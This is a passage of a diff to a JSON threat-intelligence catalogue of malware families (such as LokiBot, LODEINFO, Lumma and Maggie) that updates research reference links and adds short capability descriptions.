+ "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/",
+ "https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/"
],
"synonyms": [
"LodaRAT",
@@ -29950,14 +31629,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
"https://blogs.jpcert.or.jp/en/2021/02/LODEINFO-3.html",
- "https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf",
- "https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html",
+ "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/",
"https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf",
+ "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/",
+ "https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf",
+ "https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html",
+ "https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html",
"https://twitter.com/jpcert_ac/status/1351355443730255872",
- "https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html"
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html",
+ "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/"
],
"synonyms": [],
"type": []
@@ -29983,8 +31666,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-11-16-logpos-new-point-of-sale-malware-using-mailslots.md",
- "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html"
+ "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-11-16-logpos-new-point-of-sale-malware-using-mailslots.md"
],
"synonyms": [],
"type": []
@@ -29997,8 +31680,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.logtu",
- "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
"https://news.drweb.ru/show/?i=14177",
+ "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
"https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf"
],
"synonyms": [],
@@ -30012,25 +31695,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax",
- "https://www.youtube.com/watch?v=VeoXT0nEcFU",
- "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
- "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
"https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://habr.com/ru/amp/post/668154/"
+ "https://habr.com/ru/amp/post/668154/",
+ "https://www.youtube.com/watch?v=VeoXT0nEcFU",
+ "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
+ "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "6d53a74e-c8a5-11e8-a123-332e4eaac9bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "15228ae0-26f9-44d8-8d6e-87b0bd2d2aba",
"value": "LoJax"
},
@@ -30054,58 +31728,61 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws",
- "http://reversing.fun/reversing/2021/06/08/lokibot.html",
"https://github.com/R3MRUM/loki-parse",
- "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
- "https://isc.sans.edu/diary/27282",
- "http://www.malware-traffic-analysis.net/2017/06/12/index.html",
- "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/",
- "https://phishme.com/loki-bot-malware/",
- "http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html",
- "https://www.lastline.com/blog/password-stealing-malware-loki-bot/",
- "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
- "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/",
- "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.atomicmatryoshka.com/post/malware-headliners-lokibot",
- "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://www.youtube.com/watch?v=-FxyzuRv6Wg",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
- "https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations",
- "https://www.youtube.com/watch?v=N0wAh26wShE",
- "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html",
- "http://reversing.fun/posts/2021/06/08/lokibot.html",
- "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
- "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://www.infoblox.com/wp-content/uploads/infoblox-whitepaper-deep-analysis-of-a-recent-lokibot-attack.pdf",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
- "https://isc.sans.edu/diary/24372",
- "https://www.youtube.com/watch?v=K3Yxu_9OUxU",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/spammed-png-file-hides-lokibot/",
- "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2",
- "https://lab52.io/blog/a-twisted-malware-infection-chain/",
- "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf",
- "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
- "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/",
- "https://malcat.fr/blog/reversing-a-nsis-dropper-using-quick-and-dirty-shellcode-emulation/",
- "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/",
"https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file",
- "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/",
- "https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://malcat.fr/blog/statically-unpacking-a-simple-net-dropper/",
+ "https://lab52.io/blog/a-twisted-malware-infection-chain/",
+ "https://www.atomicmatryoshka.com/post/malware-headliners-lokibot",
+ "http://reversing.fun/reversing/2021/06/08/lokibot.html",
"https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations/",
- "https://ivanvza.github.io/posts/lokibot_analysis"
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.youtube.com/watch?v=-FxyzuRv6Wg",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
+ "https://malcat.fr/blog/statically-unpacking-a-simple-net-dropper/",
+ "http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html",
+ "https://www.youtube.com/watch?v=N0wAh26wShE",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.youtube.com/watch?v=K3Yxu_9OUxU",
+ "https://malcat.fr/blog/reversing-a-nsis-dropper-using-quick-and-dirty-shellcode-emulation/",
+ "https://ivanvza.github.io/posts/lokibot_analysis",
+ "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/",
+ "https://www.lastline.com/blog/password-stealing-malware-loki-bot/",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2",
+ "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850",
+ "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html",
+ "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/",
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
+ "https://www.infoblox.com/wp-content/uploads/infoblox-whitepaper-deep-analysis-of-a-recent-lokibot-attack.pdf",
+ "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
+ "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "http://reversing.fun/posts/2021/06/08/lokibot.html",
+ "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/spammed-png-file-hides-lokibot/",
+ "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
+ "https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html",
+ "https://phishme.com/loki-bot-malware/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files",
+ "http://www.malware-traffic-analysis.net/2017/06/12/index.html",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/",
+ "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf",
+ "https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://isc.sans.edu/diary/27282",
+ "https://isc.sans.edu/diary/24372"
],
"synonyms": [
"Burkina",
@@ -30136,11 +31813,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif",
- "https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63",
"https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
"https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062",
"https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
- "https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062"
+ "https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63"
],
"synonyms": [],
"type": []
@@ -30167,10 +31844,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper",
- "https://blog.yoroi.company/research/loocipher-the-new-infernal-ransomware/",
"https://github.com/ZLab-Cybaze-Yoroi/LooCipher_Decryption_Tool",
- "https://www.fortinet.com/blog/threat-research/loocipher-can-encrypted-files-be-recovered.html",
- "https://marcoramilli.com/2019/07/13/free-tool-loocipher-decryptor/"
+ "https://blog.yoroi.company/research/loocipher-the-new-infernal-ransomware/",
+ "https://marcoramilli.com/2019/07/13/free-tool-loocipher-decryptor/",
+ "https://www.fortinet.com/blog/threat-research/loocipher-can-encrypted-files-be-recovered.html"
],
"synonyms": [],
"type": []
@@ -30183,15 +31860,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback",
- "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/",
- "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new",
- "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/",
"https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://nao-sec.org/2021/01/royal-road-redive.html",
"https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/",
+ "https://nao-sec.org/2021/01/royal-road-redive.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new",
"https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage"
],
"synonyms": [],
"type": []
@@ -30204,11 +31882,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix",
- "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py",
- "https://twitter.com/hexlax/status/1058356670835908610",
- "https://www.bromium.com/decrypting-l0rdix-rats-c2/",
"https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/",
- "https://blog.ensilo.com/l0rdix-attack-tool"
+ "https://www.bromium.com/decrypting-l0rdix-rats-c2/",
+ "https://blog.ensilo.com/l0rdix-attack-tool",
+ "https://twitter.com/hexlax/status/1058356670835908610",
+ "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py"
],
"synonyms": [
"lordix"
@@ -30223,13 +31901,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz",
- "https://therecord.media/free-decrypter-available-for-lorenz-ransomware/",
- "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
- "https://twitter.com/AltShiftPrtScn/status/1423190900516302860?s=20",
- "https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/",
+ "https://arcticwolf.com/resources/blog/lorenz-ransomware-getting-dumped/",
"https://www.bleepingcomputer.com/news/security/meet-lorenz-a-new-ransomware-gang-targeting-the-enterprise/",
+ "https://twitter.com/AltShiftPrtScn/status/1423190900516302860?s=20",
"https://www.tesorion.nl/en/posts/lorenz-ransomware-rebound-corruption-and-irrecoverable-files/",
- "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware"
+ "https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/",
+ "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware",
+ "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
+ "https://therecord.media/free-decrypter-available-for-lorenz-ransomware/"
],
"synonyms": [],
"type": []
@@ -30242,8 +31921,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.loup",
- "https://twitter.com/r3c0nst/status/1295275546780327936",
- "https://twitter.com/Arkbird_SOLG/status/1295396936896438272"
+ "https://twitter.com/Arkbird_SOLG/status/1295396936896438272",
+ "https://twitter.com/r3c0nst/status/1295275546780327936"
],
"synonyms": [],
"type": []
@@ -30256,9 +31935,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball",
- "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/"
+ "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html"
],
"synonyms": [],
"type": []
@@ -30271,10 +31950,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey",
- "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html",
"https://www.mandiant.com/resources/apt41-us-state-governments",
"https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf",
- "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/"
+ "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/",
+ "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html"
],
"synonyms": [
"PortReuse"
@@ -30284,13 +31963,27 @@
"uuid": "515d1318-c3b1-4d40-a321-31b3baf75414",
"value": "LOWKEY"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowzero",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0922.pdf",
+ "https://malgamy.github.io/malware-analysis/The-Approach-of-TA413-for-Tibetan-Targets/#third-stage"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1efd4902-ff9e-4e71-8867-6eddb9bc456c",
+ "value": "LOWZERO"
+ },
{
"description": "This in Go written malware is lsass process memory dumper, which was custom developed by threat actors according to Security Joes. It has the capability to automatically exfiltrate the results to the free file transfer service \"transfer.sh\".",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lsassdumper",
- "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/",
- "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf"
+ "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf",
+ "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/"
],
"synonyms": [],
"type": []
@@ -30299,7 +31992,20 @@
"value": "lsassDumper"
},
{
- "description": "A stealer written in Rust.",
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lu0bot",
+ "https://bazaar.abuse.ch/browse/tag/Lu0Bot/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d81c068d-7420-40ee-ab50-5f29b2ccc314",
+ "value": "Lu0Bot"
+ },
+ {
+ "description": "According to PCRisk, The Luca stealer can extract a variety of information from compromised machines. It targets data related to the following: operating system, device name, CPUs, desktop environment, network interface, user account name, preferred system language, running processes, etc.\r\n\r\nThis malicious program can steal information from over thirty Chromium-based browsers. From these applications, Luca can obtain Internet cookies, account log-in credentials (usernames/passwords), and credit card numbers. Additionally, the stealer can extract data from password manager and cryptowallet browser extensions compatible with over twenty browsers.\r\n\r\nThis malware also targets various messaging applications like Telegram, Discord, ICQ, Skype, Element, etc. It likewise aims to acquire information from gaming-related software such as Steam and Uplay (Ubisoft Connect). Furthermore, some versions of Luca can take screenshots and download the files stored on victims' devices.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.luca_stealer",
@@ -30330,14 +32036,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat",
- "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
- "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/",
- "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/",
- "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
"https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/",
- "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html",
+ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/",
+ "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/",
+ "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
"https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark",
- "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf"
+ "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/",
+ "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html"
],
"synonyms": [
"LuminosityLink"
@@ -30348,13 +32054,21 @@
"value": "Luminosity RAT"
},
{
- "description": "Based on Mars Stealer.",
+ "description": "Lumma is an information stealer written in C, sold as a Malware-as-a-Service by LummaC on Russian-speaking underground forums and Telegram since at least August 2022. Lumma's capabilities are those of a classic stealer, with a focus on cryptocurrency wallets, and file grabber capabilities.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma",
- "https://twitter.com/fumik0_/status/1559474920152875008"
+ "https://twitter.com/sekoia_io/status/1572889505497223169",
+ "https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/",
+ "https://twitter.com/Ishusoka/status/1614028229307928582",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx",
+ "https://outpost24.com/blog/everything-you-need-to-know-lummac2-stealer",
+ "https://twitter.com/fumik0_/status/1559474920152875008",
+ "https://medium.com/s2wblog/lumma-stealer-targets-youtubers-via-spear-phishing-email-ade740d486f7"
+ ],
+ "synonyms": [
+ "LummaC2 Stealer"
],
- "synonyms": [],
"type": []
},
"uuid": "a14270e4-2b5e-4a90-9ccd-0b68690dbc3e",
@@ -30365,8 +32079,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney",
- "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html",
- "https://twitter.com/MrDanPerez/status/1097881406661902337"
+ "https://twitter.com/MrDanPerez/status/1097881406661902337",
+ "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html"
],
"synonyms": [],
"type": []
@@ -30384,15 +32098,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "fcece2f7-e0ef-44e0-aa9f-578c2a56f532",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "929112e4-e252-4273-b3c2-fd414cfb2776",
"value": "Lurk"
},
@@ -30453,9 +32158,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit",
- "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/",
"http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html",
- "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html"
+ "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html",
+ "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/"
],
"synonyms": [
"Adneukine",
@@ -30468,7 +32173,7 @@
"value": "Lyposit"
},
{
- "description": "",
+ "description": "According Zscaler, M00nD3V Logger has the ability to steal confidential information, such as browser passwords, FTP client passwords, email client passwords, DynDNS credentials, JDownloader credentials; capture Windows keystrokes; and gain access to the webcam and hook the clipboard. In all, it has the ability to steal passwords from 42 applications.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.m00nd3v",
@@ -30485,9 +32190,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.m0yv",
+ "https://github.com/baderj/domain_generation_algorithms/blob/master/m0yv/dga.py",
+ "https://github.com/baderj/domain_generation_algorithms/blob/master/expiro/dga.py",
+ "https://youtu.be/3RYbkORtFnk",
"https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/",
- "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
- "https://github.com/baderj/domain_generation_algorithms/blob/master/expiro/dga.py"
+ "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html"
],
"synonyms": [],
"type": []
@@ -30501,8 +32208,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.macaw",
"https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://www.bleepingcomputer.com/news/security/evil-corp-demands-40-million-in-new-macaw-ransomware-attacks/",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions"
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://www.bleepingcomputer.com/news/security/evil-corp-demands-40-million-in-new-macaw-ransomware-attacks/"
],
"synonyms": [],
"type": []
@@ -30515,13 +32222,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.machete",
- "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6",
"https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html",
- "https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html",
- "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america",
"https://securelist.com/el-machete/66108/",
+ "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/",
"https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf",
- "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/"
+ "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america",
+ "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6",
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html"
],
"synonyms": [
"El Machete"
@@ -30556,11 +32263,28 @@
"uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b",
"value": "Magala"
},
+ {
+ "description": "According to DCSO, this malware is written as a Extended Stored Procedure for a MSSQL server. The backdoor has capabilities to bruteforce logins to other MSSQL servers, adding a special hardcoded backdoor user in the case of successfully bruteforcing admin logins.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie",
+ "https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/",
+ "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01",
